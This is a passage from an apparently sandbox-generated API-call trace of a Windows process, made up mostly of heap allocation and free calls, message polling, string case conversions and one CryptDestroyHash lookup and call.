hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.743] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.743] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.743] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.744] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.744] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.744] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.745] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.745] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0256.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0256.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0256.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.747] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0256.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.747] CryptDestroyHash (hHash=0xaa5820) returned 1 [0256.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 